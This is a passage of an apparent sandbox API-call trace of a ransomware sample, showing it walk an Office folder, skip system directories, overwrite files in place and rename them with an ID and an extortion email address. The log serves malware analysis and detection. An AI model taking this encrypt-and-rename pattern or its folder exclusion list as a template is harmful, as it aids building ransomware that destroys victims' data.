lpUsedDefaultChar=0x0) returned 11 [0143.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WCOMP98.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WCOMP98.POC", lpUsedDefaultChar=0x0) returned 11 [0143.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WCOMP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wcomp98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.548] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=125616) returned 1 [0143.548] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.548] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1eab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1eab0, lpOverlapped=0x0) returned 1 [0143.557] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.557] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1eab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1eab0, lpOverlapped=0x0) returned 1 [0143.557] CloseHandle (hObject=0x238) returned 1 [0143.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WCOMP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wcomp98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WCOMP98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\wcomp98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.559] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2354c5c9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x166484, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEB11.POC", cAlternateFileName="")) returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2=".") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="..") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="...") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="windows") returned -1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="recovery") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="perflogs") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="documents and settings") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="system volume information") returned 1 [0143.559] lstrcmpiW (lpString1="WEB11.POC", lpString2="msocache") returned 1 [0143.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEB11.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEB11.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEB11.POC", lpUsedDefaultChar=0x0) returned 9 [0143.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEB11.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEB11.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEB11.POC", lpUsedDefaultChar=0x0) returned 9 [0143.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEB11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\web11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.561] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1467524) returned 1 [0143.561] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.561] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.573] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.573] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.574] CloseHandle (hObject=0x238) returned 1 [0143.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEB11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\web11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEB11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\web11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.575] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2354c5c9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79f1a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBCALSO.POC", cAlternateFileName="")) returned 1 [0143.575] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2=".") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="..") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="...") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="windows") returned -1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="recovery") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="perflogs") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="documents and settings") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="system volume information") returned 1 [0143.576] lstrcmpiW (lpString1="WEBCALSO.POC", lpString2="msocache") returned 1 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBCALSO.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBCALSO.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBCALSO.POC", lpUsedDefaultChar=0x0) returned 12 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBCALSO.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBCALSO.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBCALSO.POC", lpUsedDefaultChar=0x0) returned 12 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBCALSO.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webcalso.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.580] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=499482) returned 1 [0143.580] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.580] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0143.595] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.595] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0143.596] CloseHandle (hObject=0x238) returned 1 [0143.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBCALSO.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webcalso.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBCALSO.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webcalso.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.597] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2354c5c9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31da, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBEMAIL.POC", cAlternateFileName="")) returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2=".") returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="..") returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="...") returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="windows") returned -1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="recovery") returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="perflogs") returned 1 [0143.597] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="documents and settings") returned 1 [0143.598] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.598] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="system volume information") returned 1 [0143.598] lstrcmpiW (lpString1="WEBEMAIL.POC", lpString2="msocache") returned 1 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBEMAIL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBEMAIL.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBEMAIL.POC", lpUsedDefaultChar=0x0) returned 12 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBEMAIL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBEMAIL.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBEMAIL.POC", lpUsedDefaultChar=0x0) returned 12 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBEMAIL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webemail.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.599] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12762) returned 1 [0143.599] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.599] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x31d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x31d0, lpOverlapped=0x0) returned 1 [0143.601] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.601] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x31d0, lpOverlapped=0x0) returned 1 [0143.602] CloseHandle (hObject=0x238) returned 1 [0143.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBEMAIL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webemail.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBEMAIL.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webemail.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.603] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23526361, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23526361, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2354c5c9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12a02, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBHED98.POC", cAlternateFileName="")) returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2=".") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="..") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="...") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="windows") returned -1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="recovery") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="perflogs") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="documents and settings") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="system volume information") returned 1 [0143.603] lstrcmpiW (lpString1="WEBHED98.POC", lpString2="msocache") returned 1 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHED98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHED98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBHED98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHED98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHED98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBHED98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHED98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhed98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.604] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=76290) returned 1 [0143.604] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.604] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x12a00, lpOverlapped=0x0) returned 1 [0143.610] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.610] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x12a00, lpOverlapped=0x0) returned 1 [0143.611] CloseHandle (hObject=0x238) returned 1 [0143.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHED98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhed98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHED98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhed98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.614] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23572815, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23572815, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31ca, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="WEBHOME.POC", cAlternateFileName="")) returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2=".") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="..") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="...") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="windows") returned -1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="recovery") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="perflogs") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="documents and settings") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="system volume information") returned 1 [0143.614] lstrcmpiW (lpString1="WEBHOME.POC", lpString2="msocache") returned 1 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHOME.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHOME.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBHOME.POC", lpUsedDefaultChar=0x0) returned 11 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHOME.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WEBHOME.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WEBHOME.POC", lpUsedDefaultChar=0x0) returned 11 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\WEBHOME.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\webhome.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.616] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12746) returned 1 [0143.616] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.616] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x31c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x31c0, lpOverlapped=0x0) returned 1 [0143.619] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 